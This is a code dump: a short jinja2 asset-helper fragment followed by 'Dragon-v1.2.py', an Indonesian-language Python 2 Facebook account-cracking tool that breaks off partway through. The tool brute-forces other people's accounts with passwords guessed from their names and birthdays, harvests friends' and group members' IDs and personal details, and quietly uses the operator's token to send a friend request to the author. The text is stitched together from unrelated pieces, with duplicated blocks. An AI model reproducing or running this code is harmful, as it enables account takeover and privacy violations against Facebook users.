return jinja2.Markup(make_url(template_name, base_url, name))
def create_include_assets_functions(template_name, base_url):
return {
"include_css": partial(include_css, template_name, base_url),
"include_js": partial(include_js, template_name, base_url),
"include_url": partial(include_url, template_name, base_url)
}
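# --- Illustrative wiring sketch (not part of the original module). ---
# The returned partials are meant to be exposed to templates; an assumed,
# minimal registration with a jinja2 environment could look like:
#   env = jinja2.Environment(loader=jinja2.FileSystemLoader('templates'))
#   env.globals.update(create_include_assets_functions('lab', '/'))
# after which a template can call {{ include_css('theme.css') }} with only the
# asset name, since template_name and base_url are already bound.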
|
Dragon-v1.2.py
|
# Dragon-v1.2 by Mr.BV
# Do not recode
import os, sys, time, random
from sys import exit as keluar
from time import sleep as waktu
from random import random as acak
from random import choice as pilih
from sys import stdout
from os import system
m = '\x1b[1;91m'
h = '\x1b[1;92m'
k = '\x1b[1;93m'
b = '\x1b[1;94m'
u = '\x1b[1;95m'
c = '\x1b[1;96m'
p = '\x1b[0m'
i = '\x1b[1;90m'
v = '\x1b[1;38;5;198m'
j = '\x1b[1;38;5;208m'
w = (m, v, j, p, k, b, u, c)
W = pilih(w)
def load():
l = 'B '
a = 'L'
g = 'A '
i = 'C '
n = 'K '
P = ' '
r = '. '
h = '. '
w = '. '
u = '. '
o = '. '
s = '. '
e = '. '
S = '. '
for z in range(90):
waktu(0.1)
stdout.write('\r [\x1b[1;36m' + l[z % len(l)] + a[z % len(a)] + g[z % len(g)] + i[z % len(i)] + n[z % len(n)] + P[z % len(P)] + r[z % len(r)] + o[z % len(o)] + s[z % len(s)] + e[z % len(e)] + S[z % len(S)] + P[z % len(P)] + r[z % len(r)] + S[z % len(S)] + u[z % len(u)] + w[z % len(w)] + h[z % len(h)] + '\x1b[1;37m]')
stdout.flush()
load()
import os, sys, time, random
from sys import exit as keluar
from time import sleep as waktu
from random import random as acak
from random import choice as pilih
from sys import stdout
from os import system
m = '\x1b[1;91m'
h = '\x1b[1;92m'
k = '\x1b[1;93m'
b = '\x1b[1;94m'
u = '\x1b[1;95m'
c = '\x1b[1;96m'
p = '\x1b[0m'
i = '\x1b[1;90m'
v = '\x1b[1;38;5;198m'
j = '\x1b[1;38;5;208m'
w = (m, v, j, p, k, b, u, c)
W = pilih(w)
def load():
l = 'D '
a = 'R '
g = 'A'
i = 'G '
n = 'O '
P = 'N '
r = '. '
h = '. '
w = '. '
u = '. '
o = '. '
s = '. '
e = '. '
S = '. '
for z in range(90):
waktu(0.1)
stdout.write('\r [\x1b[1;36m' + l[z % len(l)] + a[z % len(a)] + g[z % len(g)] + i[z % len(i)] + n[z % len(n)] + P[z % len(P)] + r[z % len(r)] + o[z % len(o)] + s[z % len(s)] + e[z % len(e)] + S[z % len(S)] + P[z % len(P)] + r[z % len(r)] + S[z % len(S)] + u[z % len(u)] + w[z % len(w)] + h[z % len(h)] + '\x1b[1;37m]')
stdout.flush()
load()
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def exit():
print '\x1b[1;91mExit!!!!'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
logo = '\x1b[1;97m\n\x1b[1;93mTools :\x1b[1;96mDragon-V1.2\x1b[1;97m\n\x1b[1;93mAuthor:Yoga Wira\x1b[1;97m\x1b[1;96m\x1b[1;97m \x1b[1;97m\n\x1b[1;93mTeam :\x1b[1;91mBrother Victory\n'
print '\x1b[1;96m /\ /--\ '
print '\x1b[1;96m _______/ \/ 1 '
print '\x1b[1;96m /\ /____ 1'
print '\x1b[1;96m 1-------/ /__| O / 1'
print '\x1b[1;96m \--------____ / / '
print '\x1b[1;96m v v v v v \ \_____/ \ 1 '
print '\x1b[1;96m /\/\/\/\/\ / \ '
print '\x1b[1;96m /_______________ / '
print '\x1b[1;96m *Dragon-V1.2* \ / '
print '\x1b[1;96m \ Dark-Fb\ \ / '
print '\x1b[1;96m /Author:Yoga wira\/ '
os.system("figlet MicroClone |lolcat")
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[0m\n............ \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
os.system("figlet Dragon-v2 |lolcat")
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;96m================ \x1b[1;92mLOGIN WITH FACEBOOK\x1b[1;96m==============='
print '\x1b[1;97m\n\x1b[1;93m=Tools 100% Save No Keylogger='
id = raw_input('\x1b[1;97m\n\x1b[1;93m=> \x1b[0m\nE mail :\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;97m\n\x1b[1;93m=> \x1b[0m\nPassword :\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.facebook.com/rendi.andika.3133')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
os.system("figlet Black Dragon |lolcat")
print '\x1b[1;96m /\ /--\ '
print '\x1b[1;96m _______/ \/ 1 '
print '\x1b[1;96m /\ /____ 1'
print '\x1b[1;96m 1-------/ /__| O / 1'
print '\x1b[1;96m \--------____ / / '
print '\x1b[1;96m v v v v v \ \_____/ \ 1 '
print '\x1b[1;96m /\/\/\/\/\ / \ '
print '\x1b[1;96m /_______________ / '
print '\x1b[1;96m *Dragon-V1.2* \ / '
print '\x1b[1;96m \ Dark-Fb\ \ / '
print '\x1b[1;96m /Author:Yoga Wira\/ '
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\x1b[1;97m account: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m[1]. Info'
print '\x1b[1;37;40m[2]. Crack Account Facebook'
print '\x1b[1;37;40m[3]. Bot Facebook '
print '\x1b[1;37;40mpress 0 To Exit'
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;96mroot@Yoga Wira ')
if zedd == '':
print '\x1b[1;91mChose Now'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m[1]. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m[2]. Multi Bruteforce Facebook'
print '\x1b[1;37;40m[3]. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m[4]. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m[5]. Yahoo Checker'
print '\x1b[1;37;40m[6]. Ambil id/email/hp'
print '\x1b[1;31;40mpress 0 to exit'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
